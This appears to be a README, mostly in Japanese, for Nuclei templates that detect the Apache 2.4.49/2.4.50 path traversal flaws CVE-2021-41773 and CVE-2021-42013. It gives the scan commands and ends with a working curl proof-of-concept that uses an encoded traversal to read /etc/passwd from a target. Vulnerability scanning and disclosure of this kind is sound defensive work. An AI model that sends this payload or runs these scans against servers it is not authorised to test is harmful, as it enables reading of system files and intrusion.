
Apache HTTP Serverのパストラバーサル脆弱性(CVE-2021-41773、CVE-2021-42013)を検出します。これは、様々なトラバーサル手法を通じて/etc/passwdの露出をチェックすることによって行われます。
Apache Version 2.4.49 and 2.4.50
(CVE-2021-41773) and (CVE-2021-42013)
Nucleiが必要です!
https://github.com/projectdiscovery/nuclei
ローカルのNucleiインストールを確認し、テンプレートを検証してください
nuclei -t apache-vulnerable-versions.yaml -vv
および
nuclei -t apache-path-traversal-rce-v2.yaml -vv
以下の出力が表示されるはずです
[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]
および
[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]
ターゲットをスキャンするには:
nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port
ファイル内のターゲットをスキャンするには:
nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt
apache-vulnerable-versions.yaml - Apacheのバージョンを検出し、脆弱な場合はHIGHを出力します。

apache-path-traversal-rce-v2.yaml - エクスプロイトを実行し、脆弱なパスを表示します。脆弱な場合はCRITICALを出力します。

PoC:
curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
